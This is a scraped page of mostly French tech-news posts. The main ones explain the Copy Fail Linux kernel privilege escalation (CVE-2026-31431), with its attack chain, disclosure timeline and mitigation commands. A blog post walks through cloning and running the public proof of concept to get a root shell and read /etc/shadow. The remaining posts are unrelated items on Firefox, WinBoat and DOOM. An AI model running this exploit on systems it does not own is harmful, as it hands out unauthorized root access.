Or support us by using our affiliate links on Amazon UK and Amazon US
    
 
Alternatively, why not ask me on the ASK NASCompares forum, by clicking the button below. This is a community hub that serves as a place that I can answer your question, chew the fat, share new release information and even get corrections posted. I will always get around to answering ALL queries, but as a one-man operation, I cannot promise speed! So by sharing your query in the ASK NASCompares section below, you can get a better range of solutions and suggestions, alongside my own.

☕ WE LOVE COFFEE ☕

 

Phishing Campaign Hits 80+ Orgs Using SimpleHelp and ScreenConnect RMM Tools

An active phishing campaign has been observed targeting multiple vectors since at least April 2025 with legitimate Remote Monitoring and Management (RMM) software as a way to establish persistent remote access to compromised hosts. The activity, codenamed VENOMOUS#HELPER, has impacted over 80 organizations, most of which are in the U.S., according to Securonix. It shares overlaps with clusters

Copy Fail (CVE-2026-31431) : Synthèse technique sur cette faille Linux

3 mai 2026 à 08:07
Bonjour à tous,

Dans cet article, que je prends le temps d'écrire le 3 mai (donc avec les infos que j'ai au 3 mai), je souhaite vous parler plus en détail de cette vulnérabilité Copy Fail.
Je n'ai pas vu d'infos techniques en français sur le sujet, et j'ai voulu aprofondir mes connaissances et le fonctionnement de cette faille. J'espère que ça vous servira.
Tout en bas, je vous mets les sources associées à mes recherches.

Il y a beaucoup d'incompréhensions dessus, et c'est une vulnérabilité que je considère comme nettement plus grave que ce que la plupart des analyses superficielles laissent entendre. Classifiée CVE-2026-31431 avec un score CVSS de 7.8/10, elle permet à n'importe quel processus tournant sur une machine Linux de devenir root, et ce, sur l'intégralité des distributions majeures depuis 2017. Le proof-of-concept public fait 732 octets de Python. En une commande, on devient root. C'est incroyable !

Anatomie d'une faille : une conjonction, pas un bug isolé
Petite pensée à Olivier Poncet avec la formulation "Anatomie d'une faille"

Ce qui rend CopyFail particulièrement intéressante d'un point de vue technique, c'est qu'elle n'est pas le résultat d'un bug unique comme on l'a parfois vu. C'est la conjonction de trois évolutions indépendantes du noyau Linux qui, ensemble, créent une faille exploitable.

Voilà la chronologie en quelques phrases :

2011 : Le wrapper cryptographique AEAD
En 2011, un wrapper cryptographique AEAD (Authenticated Encryption with Associated Data) est introduit dans le noyau pour gérer IPsec (le protocole qui chiffre chaque paquet réseau individuellement, très utilisé dans les VPN).
Ce wrapper, a un comportement un peu crade mais toléré : lors du déchiffrement d'un bloc, il écrit 4 octets en dehors de sa zone mémoire déclarée. C'est du dépassement de tampon, certes, mais à ce stade c'est totalement confiné à l'intérieur du noyau. Il n'y a aucune interface avec les processus utilisateurs. Aucun risque pratique.

2015 : Les sockets AF_ALG
Quatre ans plus tard, une nouvelle famille de sockets fait son apparition : les AF_ALG sockets.
Leur rôle ? Offrir à l'espace utilisateur une interface directe vers le sous-système cryptographique du noyau (y compris vers le handler AEAD décrit ci-dessus. Désormais, un processus non-privilégié peut ouvrir un socket, demander au noyau de chiffrer ou déchiffrer des données via AEAD, et récupérer le résultat. C'est toujours fonctionnel, mais on vient d'exposer vers l'extérieur un composant qui avait jusqu'ici une petite bizarrerie interne.

2017 : Le commit problématique (72548b093e3)
C'est ici que tout bascule !
En 2017, un commit introduit dans algif_aead.c ce qui ressemble à une optimisation de performance : la mémoire d'entrée et la mémoire de sortie du traitement AEAD sont fusionnées et donc on traite les données en place (in-place processing).
Le problème : cela crée un chemin dans lequel les 4 octets qui étaient précédemment écrits de façon inoffensive en dehors des limites, se retrouvent maintenant à déborder dans des zones mémoire contrôlables depuis l'espace utilisateur. La faille est en place. Elle sera donc introduite à ce moment là, sans être détectée, pendant 9 ans !

A propos du mécanisme d'exploitation : le page cache comme vecteur

Pour comprendre comment l'exploitation fonctionne concrètement, il faut maîtriser deux concepts fondamentaux du noyau Linux. Je vais le faire assez court mais je pense assez complet pour illustrer le rôle qu'à le page cache dans cette affaire.

Le page cache est une portion de la RAM que le noyau dédie au stockage en mémoire des contenus de fichiers lus depuis le disque. Quand on lit /usr/bin/su, son contenu est chargé en RAM dans le page cache. La prochaine fois qu'un processus en a besoin, le noyau ne va pas relire le disque, il sert directement depuis la RAM.
On le sait, la RAM est beeeeeeaucoup plus rapide qu'un disque, même un SSD ! Donc autant l'utiliser et en profiter !
Ce qui est problématique ici : le page cache est global au système. Il n'est pas par processus, ni par conteneur (ce qui pose souci si on a du docker par exemple). Il est au niveau du noyau, partagé par tout le monde.

L'appel système splice() est un appel système qui permet de déplacer des données entre deux file descriptors sans repasser par l'espace utilisateur. Couplé aux AF_ALG sockets, il devient le vecteur parfait : on peut manipuler des données dans le noyau sans jamais exposer un pointeur ou une adresse en espace utilisateur.
Y a une p'tite page de manuel qui explique bien ça : https://www.man7.org/linux/man-pages/man2/splice.2.html

La chaîne d'attaque

Voici ce que fait l'exploit en pratique :
Etape 1 : Ouverture d'un socket AF_ALG avec le type AEAD.
Etape 2 : Lecture d'un binaire SUID (par exemple /usr/bin/su) dans le page cache. Ce binaire est en mémoire, sa copie disque est intouchée.
Etape 3 : Grâce au débordement des 4 octets dans algif_aead.c et à splice(), l'exploit écrit des données contrôlées dans le page cache, à un offset précis correspondant au contenu du binaire en mémoire. Il le fait par blocs de 4 octets.
Etape 4 : : Le contenu en mémoire de /usr/bin/su est maintenant modifié (remplacé par un shellcode qui lance un shell.
Etape 5 : La copie sur disque est intacte. Le noyau ne sait pas que le page cache a été altéré.
Etape 6 : Quand n'importe qui exécute su, le noyau ne relit pas le disque mais il charge la version en mémoire, la version compromise. su étant SUID root, le shell se lance en tant que root.

Petite note sur le SUID : Le SUID est un bit de permission qui permet à un utilisateur d'exécuter un programme avec les privilèges du propriétaire de ce fichier le temps de son exécution. su ayant comme propriétaire "root" le programme se lance en tant que root !
C'est le "s" du "rws" qui identifie le SUID. Voici sur ma Fedora le résultat :
Code BASH :
-rwsr-xr-x 1 root root 56K  1 avril 02:00 /usr/bin/su


La seule façon d'invalider l'exploit est de vider explicitement le page cache (sinon ça se fait au bout d'un certain temps) à travers /proc/sys/vm/drop_caches. Mais attention ça vide tout le cache et ça va dégrader les performances de la machine.


La gravité de cette faille est réelle : pourquoi 7.8 est trompeur selon moi ?

Le score CVSS de 7.8 reflète le fait qu'une exécution de code locale est nécessaire. C'est techniquement juste. Mais c'est là que la plupart des analyses s'arrêtent, et c'est là qu'elles sous-estiment massivement la menace.

Ce que "local" signifie vraiment ici : il ne s'agit pas d'un accès shell interactif, ni d'un compte utilisateur sur la machine.
Entendez par là qu'on peut l'exploiter sans se connecter avec une session utilisateur en ssh sur la machine.

Je m'explique : il s'agit de n'importe quel processus en cours d'exécution. Par exemple, apache httpd peut exploiter cette faille, un interpréteur PHP aussi, un module vérolé nodejs aussi, ou un pipline, en fait tout ce qui peut lancer un processus sur la machine.

Alors OUI, CopyFail seul n'est pas exploitable à distance. Mais CopyFail n'est jamais seul dans un environnement réel. Le scénario d'attaque possible peut être le suivant : 1 Remote Code Execution (RCE) dans n'importe quelle application + CopyFail = root complet sur la machine !!!
Donc, en combinant ce vecteur avec CopyFail, on obtient une élévation de privilège complète sans aucune interaction avec un compte utilisateur.

Donc on comprends que les hébergeurs, les machines hébergenant des conteneurs, les environnements mutualisés avec des Joomla, Drupal ou WordPress avec des plugins vérolés ou pas à jour tous sont des cibles directes.

Vu que les conteneurs sont à la mode, rappelons que le page cache est au niveau du noyau, pas du conteneur. Cette faille est donc également un vecteur de "container escape" : depuis un conteneur Docker ou même podman rootless, on peut modifier le page cache du noyau hôte et obtenir root sur la machine physique. Vous comprenez donc le problème :)


Pas d'antivirus, pas de conditions

Ce qui fait le cauchemar des sysadmins aujourd'hui, c'est que la modif étant dans le page cache, un antivirus n'y verra rien du tout. Seuls des EDR (comme je le dis toujours, ces fameux super antivirus) peuvent contrer ce genre d'attaque, car les EDR analysent les comportements des processus, des processus entre eux et de leurs interractions, en plus des fichiers ouverts, modifiés, etc.. D'ailleurs, sur des systèmes vulnérables, c'est l'EDR qui chez nous nous a sauvé les fesses, lors de mes tests, en attendant que le patch arrive chez Red Hat !
Mais les EDR ont un coût. Pour des PME ou des particuliers qui ont leur VPS ou leur homelab, on n'a pas d'EDR.

Aussi, il n'y a aucune condition de version à respecter. Les LPE (en français les Escalades de Privilèges en Local) classiques nécessitent souvent un alignement précis de version noyau ou de décalage mémoire ou d'un contexte précis. Ici, le même script Python de 732 octets fonctionne sur Ubuntu 24.04, Red Hat Enterprise Linux 9 et 10, Suse Linux Enterprise 16, ... donc l'exploit est "toujours fonctionnel"

ici, même si le code fourni est en python, c'est pour le PoC, mais vous pouvez reproduire la même chose en Rust même !


La découverte : une intuition assistée par IA

Je l'ai dit dans mon dernier article et dans ma vidéo, la découverte est fascinante.
Depuis la publication de la vidéo, j'ai pris le temps de me renseigner sur le "découvreur". Merci à Korben pour son article d'ailleurs !
La faille a été trouvée par Li Tang (ou Taang Lee), chercheur chez Théorie, une société de sécurité offensive réputée ayant notamment fini dans le top 3 du challenge AI Cyber Challenge du DARPA. Son approche est intéressante : il avait une intuition que le sous-système crypto du noyau Linux comportait des chemins d'accès non explorés susceptibles de permettre une élévation de privilège. Il a utilisé l'outil interne de Théorie, AI Xint Code, pour explorer le sous-système, non pas pour que l'IA trouve la faille à sa place, mais pour lui faire gagner du temps. Une analyse qui lui aurait pris une journée a été faite en une heure. Un bon exemple de ce que l'IA apporte vraiment à la recherche offensive : de l'accélération au service d'un expert, pas un remplacement de l'expertise !


La gestion de la divulgation : le vrai scandale

C'est là que les choses deviennent problématiques, et que j'estime que la situation est bien plus grave qu'une simple faille technique. Et vous allez comprendre pourquoi au moment de la publication "publique" de la faille, les distributions n'étaient pas prêtes.

Selon le site de CopyFail :
23 mars : Bug signalé à l'équipe sécurité du noyau Linux
24 mars : Accusé de réception
25 mars : Premiers patchs proposés et analysés
1er avril : Correctif principal intégré dans la branche de dev (RC de 7.0)
11 avril : Versions 6.18.22 et 6.19.12 corrigées
22 avril : CVE attribuée
29 avril : Divulgation publique ... et personne n'est prêt !


Personne n'est prêt : un problème de coordination

La mailing list Linux-distros est le mécanisme prévu pour permettre aux distributions (Debian, Ubuntu, Red Hat, SUSE, Oracle Linux, etc... ) de travailler ensemble sur des problèmes de sécurité de façon non publique. Il me semble qu'il y a une période "d'embargo" de 14 jours, mais plus sûr.
L'idée c'est de pouvoir backporter les correctifs sur leurs branches du noyau maintenues, les compiler, les tester, puis les déployer de façon coordonnée. Car en effet, Ubuntu, Red Hat ne suivent pas forcément les mêmes versions du noyau que les officielles.
Notez qu'en 2026, Red Hat maintient (officiellement) RHEL10, RHEL 9 et RHEL 8. Canonical maintient Ubuntu 16.04 18.04 20.04 22.04 24.04 et 26.04. Il y a probablement la même chose chez Debian et SUSE mais je connais moins leur cycle de vie exact.
Les distributions vivent plus longtemps que les périodes LTS des noyaux Linux, et ceux-ci ne montent pas en version au cours du cycle de vie de la distribution.

Ici, les distributions n'ont pas été notifiées via ce canal. Elles ont appris l'existence de la faille en même temps que nous en fait, soit le 29 avril.

Au moment de la divulgation publique, seules les versions 7.0, 6.18 et 6.19 du noyau avaient un correctif.
Les autres versions LTS du noyau (6.12, 6.6, 6.1, 5.15 et 5.10) n'en avaient pas encore.
Debian utilise par exemple le 6.12 pour trixie, le 6.1 pour bookworm et 5.10 pour bullseye qui est old old stable.
Les correctifs ont dû être développés en urgence par l'équipe noyau et les distributions en même temps que le PoC tournait déjà partout.
Le correctif lui-même a été commité de manière à ressembler à une optimisation ou un fix mineur le 11 avril (je vous mets le lien en dessous de la mailing list du kernel). C'est une pratique parfois légitime pour éviter qu'un attaquant ne l'analyse avant le déploiement, mais qui dans ce cas a aussi contribué à retarder la prise de conscience générale.


Mitigation et correctifs

Cette section de mon article, la dernière sera obsolète quand tous les systèmes seront patchés et mis à jour.
Cependant, quelques infos pour se sécuriser à court terme.

Pour Debian , si vous ne pouvez pas mettre à jour et rebooter de suite, il "suffit" de blacklister le module et de le décharger si nécessaire :
Code BASH :
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead


Pour Red Hat Enterprise Linux et dérivés, le module est "compilé en dur" dans le noyau :
Code BASH :
rmmod: ERROR: Module algif_aead is builtin.

Il faut alors modifier la ligne du boot via grubby par exemple ou dans /etc/default/grub :
Code BASH :
grubby --update-kernel=ALL --args='initcall_blacklist=algif_aead_init'

Et ensuite rebooter .. oui faut rebooter :(

Pour Ubuntu, je pense que c'est pareil que Debian, et SUSE à vérifier si c'est compilé en dur ou pas, mais vous avez les 2 solutions.

Attention : cela désactive les sockets AEAD, ce qui peut casser IPsec si vous l'utilisez !


Conclusion

Ici, je vais conclure, en disant que CopyFail est une faille élégante, profonde, et que je considère comme sous-estimée par une grande partie de la communauté. Elle n'est pas simplement une escalade de privilèges classique.
C'est la combinaison d'une mauvaise gestion mémoire héritée, d'une interface mal pensée avec l'espace utilisateur, et d'une optimisation qui a ouvert une fenêtre d'exploitation universelle. Cependant chaque étape (en 2011, 2015 et 2017) étant assez espacée temporellement et plutôt indépendante, c'était difficile de la voir venir.
Le fait qu'elle soit exploitable depuis n'importe quel processus (pas seulement depuis un shell je le rappelle) en fait un outil de choix pour tout attaquant ayant déjà un pied dans un système, qu'il s'agisse d'un serveur web compromis, d'une vulnérabilité d'une application, , ou d'un conteneur mal isolé.
La gestion chaotique de sa divulgation a laissé des millions de serveurs exposés avec un PoC public et sans correctif disponible.


Travail et sources utilisées

Cette synthèse m'a pris tout le dimanche matin, avec les informations que j'ai pu récolter dont les voici :
- Korben.info : https://korben.info/copy-fail-faille-kernel-linux-decouverte-ia.html
- Site Officiel de la faille : https://copy.fail
- Write-up officiel de Theori/Xint, la source technique de référence, avec la root cause analysis complète, la chaîne d'exploitation et la timeline de disclosure : https://xint.io/blog/copy-fail-linux-distributions
- OSS-Security mailing list, l'annonce publique originale du 29 avril avec les commits kernel exacts : https://www.openwall.com/lists/oss-security/2026/04/29/23
- La Mailing list du kernel avec les correctifs : https://lore.kernel.org/linux-cve-announce/2026042214-CVE-2026-31431-3d65@gregkh/T/#u
- La fiche CVE officielle : https://nvd.nist.gov/vuln/detail/CVE-2026-31431
- Le commit fautif de 2017 (l'optimisation in-place qui introduit la faille) : https://github.com/torvalds/linux/commit/72548b093ee3
- Blog Ubuntu : https://ubuntu.com/blog/copy-fail-vulnerability-fixes-available
- Suivi Ubuntu : https://ubuntu.com/security/CVE-2026-31431
- Suivi Debian : https://security-tracker.debian.org/tracker/CVE-2026-31431
- Suivi Red Hat : https://access.redhat.com/security/cve/cve-2026-31431
- Solution mitigation Red Hat : https://access.redhat.com/solutions/7141931
- Blog Alma Linux : https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/


Cet article m'a pris beaucoup de temps, et si vous avez aimé le lire, n'hésitez pas à me faire un don vous pouvez le faire ici
En faisant toutes ces recherches, j'ai énormément appris sur le sujet, qui est encore plus passionnant !

Lancer des applications Windows sous Linux

Par : Mr Xhark
1 mai 2026 à 08:00

Florian du site IT-Connect nous présente WinBoat : une sorte de Wine améliorée qui fonctionne en déportant l'écran d'un container Windows qui tourne dans Linux, un peu à la manière d'une application Citrix ou RDS :

Cela consommera certes un peu de ressources à cause du container qui tourne en fond, mais la compatibilité sera bien meilleure qu'avec Wine. La solution est plutôt bien finie et originale, à tester !

Merci Florian pour cette découverte 👍

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 01/05/2026 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Lancer des applications Windows sous Linux provient de : on Blogmotion.

New Python Backdoor Uses Tunneling Service to Steal Browser and Cloud Credentials

Cybersecurity researchers have disclosed details of a stealthy Python-based backdoor framework called DEEP#DOOR that comes with capabilities to establish persistent access and harvest a wide range of sensitive information from compromised hosts. "The intrusion chain begins with execution of a batch script ('install_obf.bat') that disables Windows security controls, dynamically extracts an

Comment activer l'adblock natif de Firefox 149 ?

Par : Korben ✨
30 avril 2026 à 15:55

Vincent en avait parlé il y a peu : Firefox 149 embarque maintenant discrètement adblock-rust , le moteur Adblock de Brave, désactivé par défaut et contrôlé uniquement par deux prefs dans about:config.

A l'origine, je vous avais parlé d'une extension mais après analyse plus approfondie, celle-ci n'est pas vraiment nécessaire. Y'a juste deux valeurs à coller dans about:config et le moteur tourne. Merci donc à François qui m'a indiqué cette méthode directe.

Étape 1 : Activer le moteur

Dans la barre d'adresse, tapez about:config et acceptez l'avertissement. Cherchez la préférence suivante :

privacy.trackingprotection.content.protection.enabled

Passez-la à true. Si elle n'existe pas encore dans votre profil, créez-la : clic droit quelque part dans la liste → Nouveau → Booléen.

Étape 2 : Charger vos listes de filtres

Cherchez ensuite cette seconde préférence :

privacy.trackingprotection.content.protection.test_list_urls

Collez-y la valeur suivante, toutes les URLs séparées par des pipes :

https://easylist.to/easylist/easylist.txt|https://easylist.to/easylist/easyprivacy.txt|https://secure.fanboy.co.nz/fanboy-cookiemonster.txt|https://raw.githubusercontent.com/uBlockOrigin/uAssets/refs/heads/master/filters/annoyances-others.txt|https://raw.githubusercontent.com/AdguardTeam/FiltersRegistry/master/filters/filter_2_Base/filter.txt|https://raw.githubusercontent.com/uBlockOrigin/uAssets/refs/heads/master/filters/filters.txt|https://raw.githubusercontent.com/AdguardTeam/FiltersRegistry/master/filters/filter_3_Spyware/filter.txt|https://pgl.yoyo.org/adservers/serverlist.php?hostformat=adblockplus&showintro=1&mimetype=plaintext

Ça couvre 8 listes : EasyList, EasyPrivacy, Fanboy Cookie Monster, uBO Annoyances (les 4 de base), plus uBO Filters, AdGuard Base, AdGuard Tracking et Peter Lowe. Si vous voulez un profil plus léger, vous pouvez supprimer des URLs avant de coller.

Petite note : le préfixe test_ dans le nom de cette pref indique que la feature est encore expérimentale dans Firefox 149. Les noms peuvent donc changer dans une version future.

Désactiver ETP (optionnel mais recommandé)

La protection contre le pistage intégrée de Firefox (ETP) et adblock-rust filtrent chacun de leur côté. C'est redondant. Pour désactiver ETP, allez dans about:preferences → Confidentialité et sécurité → Protection renforcée contre le pistage → cochez "Personnalisée", puis décochez tout ce que vous voulez confier à adblock-rust.

Limitation actuelle : adblock-rust ne gère pas encore les sélecteurs CSS de masquage d'éléments, les règles ## du style uBlock Origin. Brave les supporte déjà, Firefox devrait suivre. En attendant, quelques pubs que uBO cachait via CSS resteront visibles.

Pour le contexte technique complet sur l'intégration de ce moteur, allez lire l'article de Vincent sur l'arrivée discrète d'adblock-rust dans Firefox 149 . Et si vous voulez un guide général pour bloquer les pubs et trackers sur le web , c'est par là.

Merci à François pour la méthode et la liste de filtres !

Copy Fail - Une IA trouve la faille Linux que personne n'a vue

Par : Korben ✨
30 avril 2026 à 11:27

732 octets, c'est tout ce qu'il faut pour passer de simple utilisateur à root sur n'importe quel Linux non patché compilé depuis 2017, soit la quasi-totalité des kernels. Cette faille béante s'appelle Copy Fail (CVE-2026-31431), elle a été dénichée par Taeyang Lee de chez Theori avec leur outil d'audit IA Xint Code. Et comme elle vient d'être divulguée hier sur la liste oss-security et qu'en plus, ils ont fait un joli petit site qui explique tout comme ça fonctionne, je vais essayer de tout vous expliquer !

La faille elle-même est moche mais surtout, c'est un agent IA qui l'a sorti en une heure environ. C'est un bug que la communauté kernel a laissé passer durant près de 9 ans et qui se trouve dans le sous-système crypto.

En gros, le noyau Linux expose une interface réseau spéciale pour accéder aux opérations de chiffrement depuis un programme normal, sans droits particuliers.

Et depuis 2017, une optimisation dans ce mécanisme a créé une situation bizarre : un fichier en lecture seule sur le disque, disons un binaire système, peut se retrouver dans la zone de sortie d'une opération de chiffrement .C'est la zone que votre programme a le droit de modifier.

Il suffit alors d'enchaîner un appel système particulier (splice) pour écrire 4 octets au bon endroit, on répète ça en boucle, et on modifie progressivement un binaire système de votre choix comme par exemple /usr/bin/su.

Et voilà, vous êtes root !

Maintenant, si vous administrez un serveur, le plus propre reste de patcher le kernel via votre distro. En attendant le patch, la mitigation dépend de comment votre distro a compilé le module algif_aead, et là il y a deux situations bien distinctes.

Cas 1 - Distros où le module est chargeable dynamiquement (Ubuntu, Debian, Arch, etc.). Vous le bloquez avec :

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead

Cas 2 - Distros entreprise où le module est compilé en dur dans le kernel (RHEL, Rocky Linux, AlmaLinux, Oracle Linux, SUSE Enterprise...). Là, attention au piège : lsmod | grep algif_aead ne renvoie rien, mais ça ne signifie PAS que c'est désactivé. Le code est embarqué directement dans le vmlinuz, donc rmmod et la blacklist via /etc/modprobe.d/ sont sans effet (vous aurez "Module algif_aead is builtin"). La vraie mitigation passe par la kernel command line au boot :

sudo grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
sudo reboot

Ça empêche l'init_call du module de tourner au démarrage. Vous vérifiez ensuite avec cat /proc/cmdline que le paramètre est bien pris en compte. Si vous voulez aller encore plus loin, il est aussi possible de bloquer toute la surface d'attaque AF_ALG via seccomp au niveau de chaque service exposé.

Le PoC est également trouvable. C'est un script Python (Python 3.10+ obligatoire pour os.splice) capable de faire tomber Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1 et SUSE 16 avec exactement le même code.

Dans une première version j'avais écrit que SELinux en mode enforcing par défaut bloquait l'exploit sur Fedora et RHEL. C'est inexact, et je remercie le lecteur qui m'a fait corriger. La policy SELinux par défaut de Fedora et RHEL autorise les contextes utilisateurs à créer des sockets AF_ALG, et l'exploit écrit directement dans le page cache kernel sans déclencher les hooks LSM file-based.

Donc SELinux enforcing ne bloque pas Copy Fail tel que livré par défaut. Le seul OS immune via SELinux est GrapheneOS , qui durcit la policy AOSP en réservant AF_ALG au seul process dumpstate. Ceux qui veulent tester sans Python peuvent aussi regarder du côté du port C indépendant , un exécutable statique de 1,7 Ko sans dépendance externe.

Les comparaisons avec Dirty COW et Dirty Pipe pleuvent, sauf que là où Dirty COW exigeait du timing précis et où Dirty Pipe demandait une manipulation spécifique du pipe-buffer, Copy Fail tape tout pareil sur 4 distribs majeures sans rien avoir à ajuster.

Et côté sévérité officielle, c'est du 7.8/10 donc c'est assez élevé !

Pour trouver cette faille, Xint Code, l'agent IA de Theori, n'a pas tâtonné à l'aveugle. Taeyang Lee lui a surtout glissé un prompt très précis qui lui demandait d'examiner tous les chemins accessibles depuis un programme utilisateur dans le sous-système crypto, en insistant sur le fait que splice() peut faire atterrir des fichiers en lecture seule dans des zones modifiables.

Une heure plus tard, Copy Fail sortait comme trouvaille critique ! Theori précise que le même scan a aussi remonté d'autres vulnérabilités encore sous embargo. Brrrrrr.... Tremblez simples mortel !

Ouais donc ouais, l'IA n'a pas remplacé l'expertise humaine, mais elle l'a démultipliée. Car Lee savait où regarder, et Xint Code a juste fait ce qu'il aurait fait mais en plus rapide ! C'est pas magique donc... Mais ça fait gagner du temps !

L'exploit est dispo ici sur le GitHub de Theori et côté impact, c'est costaud sur les hôtes multi-users et tout ce qui est environnements partagés. Je pense aux conteneurs Docker, aux clusters Kubernetes, aux pipelines CI/CD...etc.

Après si y'a que vous qui avez accès à votre serveur, c'est un peu moins critique car il faut forcément un accès local pour l'exploiter. C'est la même logique de chaînage que BlueHammer côté Windows , sauf qu'ici la marche jusqu'à root est encore plus petite.

Comment tester le PoC sur une machine de test ?

Si vous avez une VM sous Ubuntu 22.04 non patchée (kernel 5.15.x), voilà exactement ce qui se passe, testé en conditions réelles. Ne faites ça que sur une machine dont vous êtes propriétaire et où vous avez l'autorisation explicite.

Étape 1 - Cloner le PoC et vérifier le hash

manu@ubuntu:~$ git clone https://github.com/theori-io/copy-fail-CVE-2026-31431
Cloning into 'copy-fail-CVE-2026-31431'...
remote: Enumerating objects: 9, done.
Resolving deltas: 100% (1/1), done.

manu@ubuntu:~$ cd copy-fail-CVE-2026-31431 && sha256sum copy_fail_exp.py
a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 copy_fail_exp.py

manu@ubuntu:~/copy-fail-CVE-2026-31431$ id
uid=1000(manu) gid=1000(manu) groups=1000(manu) ← utilisateur normal, pas root

Theori ne publie pas de hash officiel dans leur README, mais le SHA256 ci-dessus est celui du PoC tel qu'il est actuellement sur le repo. Si votre hash diffère, ne lancez pas le script.

Étape 2 - Lancer l'exploit

manu@ubuntu:~/copy-fail-CVE-2026-31431$ python3 copy_fail_exp.py

# L'exploit écrit 4 octets à la fois dans le page cache de /usr/bin/su
# via l'interface AF_ALG du kernel (authencesn + splice)
# Aucune race condition, aucun timing précis requis.

Mot de passe :

Le script utilise AF_ALG (l'interface crypto du kernel) combiné à splice() pour écrire un shellcode de 160 octets directement dans le page cache de /usr/bin/su, sans jamais toucher le disque. Il remplace ensuite le binaire patché pour exécuter un shell root.

Étape 3 - Shell root obtenu

root@ubuntu:~# id
uid=0(root) gid=1000(manu) groups=1000(manu)

root@ubuntu:~# whoami
root

root@ubuntu:~# uname -r
5.15.0-143-generic

# Kernel 5.15 vulnérable confirmé - Ubuntu 22.04 non patché

Notez le uid=0(root) alors qu'on est parti d'un uid=1000 sans aucun mot de passe, aucune race condition, aucun timing à ajuster. Brutal.

Étape 4 - Accès aux fichiers root-only

root@ubuntu:~# cat /etc/shadow | head -3
root:*:20271:0:99999:7:::
daemon:*:20271:0:99999:7:::
bin:*:20271:0:99999:7:::

root@ubuntu:~# cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash

/etc/shadow est normalement illisible pour un utilisateur standard. Là, avec notre PoC en Python et zéro interaction supplémentaire, on y accède comme si de rien n'était. Sur un serveur multi-utilisateurs, c'est game over pour tous les comptes présents.

Sur un système patché, le script échoue proprement à l'étape 2 avec un message d'erreur. C'est aussi simple que ça pour vérifier votre exposition.

Bref, mettez à jour vos kernels ou désactivez le module fautif rapidement !

Source

DOOM tourne aussi dans ChatGPT et Claude (évidemment)

Par : Korben ✨
29 avril 2026 à 09:31

DOOM a déjà été porté sur des thermostats, des tests de grossesse, et même un piano ! Manquait donc plus que les chatbots IA !

Et voilà que c'est fait puisque Chris Nager vient de faire tourner DOOM dans ChatGPT et Claude, jouable directement dans la fenêtre du chat.

Le truc tient en deux outils MCP. Pour rappel, MCP (Model Context Protocol), c'est le protocole standard qui permet à une IA d'appeler des outils externes.

Ici donc, create_doom_session lance le jeu inline dans l'application, et get_doom_launch_url renvoie une URL de fallback pour les clients qui ne savent pas afficher d'UI inline.

Sous le capot, c'est cloudflare/doom-wasm qui tourne, avec les assets libres de Freedoom Phase 1, le tout écrit en TypeScript et hébergé sur Netlify. Vous tapez "lance DOOM" dans Claude, ça démarre le rendu canvas directement dans la fenêtre de chat, et hop, les démons sont là !

Pour ceux qui débarquent, DOOM est sorti en décembre 1993, et le running gag "can it run DOOM?" remonte à la fin des années 90, quand id Software a libéré le code source du jeu en 1997. Et depuis 30 ans, DOOM tourne déjà sur tout un tas de matos comme des distributeurs de billets, des oscilloscopes, des frigos, ou même des satellites en orbite... la liste est sans fin !

Y'a même un type qui avait fait tourner DOOM avec du CSS dans un navigateur le mois dernier. Alors c'est sûr que ChatGPT et Claude étaient déjà sur la liste des prochaines cibles évidentes.

Alors pourquoi ça devient possible maintenant ? Hé bien parce que la spécification MCP Apps est passée en stable fin janvier. C'est donc l'extension du Model Context Protocol qui permet à un serveur MCP de retourner une UI interactive (HTML, canvas, dashboards) directement intégrée dans la conversation.

Tout ça est sandboxé dans une iframe, ça communique via postMessage, et c'est aussi supporté côté VS Code. On est totalement dans la lignée de ces outils MCP qu'on commence à voir partout.

Comme MCP donne déjà à l'app une zone d'affichage dans la conversation (une iframe hôte), le réflexe naturel, c'est d'y caler une page web qui contiendrait elle-même DOOM.

Sauf que ça fait deux fenêtres imbriquées qui se battent avec les règles de sécurité du navigateur (CSP, frame-src, tout ça). Du coup, Chris a eu une idée de génie et a viré la couche du milieu et posé l'écran du jeu directement dans la zone fournie par MCP. Une couche en moins, et tout marche nickel !

Côté limites, faut savoir que c'est une version vraiment épurée. Pas de sauvegarde ni de chargement de partie, pas de screenshots, pas d'état persistant entre les sessions. Tout ça a été coupé volontairement pour gagner en stabilité.

Pour tester chez vous, les amis, le code est dispo sur GitHub via la PR #54 du repo de Chris, prête à être ajoutée à votre config Claude Desktop ou ChatGPT. Y a de quoi s'amuser.

Bref, DOOM tourne désormais directement dans la fenêtre de chat de votre IA préférée. La question n'est plus "qu'est-ce qui peut faire tourner DOOM ?" mais "qu'est-ce qui ne le fait PAS encore ?".

Source : Chris Nager

Est-ce qu’une personne peut tout changer ? – RDV Tech

Par : NotPatrick
28 avril 2026 à 16:00

Au programme :

Tim Cook quitte la présidence d’Apple

Avec John Ternus, le hardware de retour aux commandes chez Apple

Le journal de l’IA: rapid fire edition

Le reste de l’actualité


Infos :

Animé par Patrick Beja (BlueskyInstagramTwitterTikTok).

Co-animé par Guillaume Vendé (Bluesky).

Co-animé par Damien Licata Caruso (Bluesky).

Produit par Patrick Beja (LinkedIn) et Fanny Cohen Moreau (LinkedIn).

Musique libre de droit par Daniel Beja


Le Rendez-vous Tech épisode 663 – Est-ce qu’une personne peut tout changer ? – Tim Cook & John Ternus, OpenAI, Anthropic, Github, Claude Mythos


---

Liens :


🎧 L’Actu Tech (podcast daily): NotPatrick.com/#lactutech

😎 Soutien sur Patreon : Patreon.com/RDVTech

🤗 Communauté Discord : NotPatrick.com/discord


Par écrit :

📰 Newsletter : NotPatrick.com/newsletter

📰 Archives NL: NotPatrick.com/archivenl

📢 WhatsApp : NotPatrick.com/whatsapp

🐤 Veille Twitter : Twitter.com/RdvTech


En vidéo :

📹 Live : Twitch.tv/NotPatrick

📺 VOD : YouTube.com/NotPatrickPodcasts

📱 TikTok : Tiktok.com/@NotNotPatrick


💁 Tous les liens : NotPatrick.com


Hébergé par Acast. Visitez acast.com/privacy pour plus d'informations.

💾

© NotPatrick

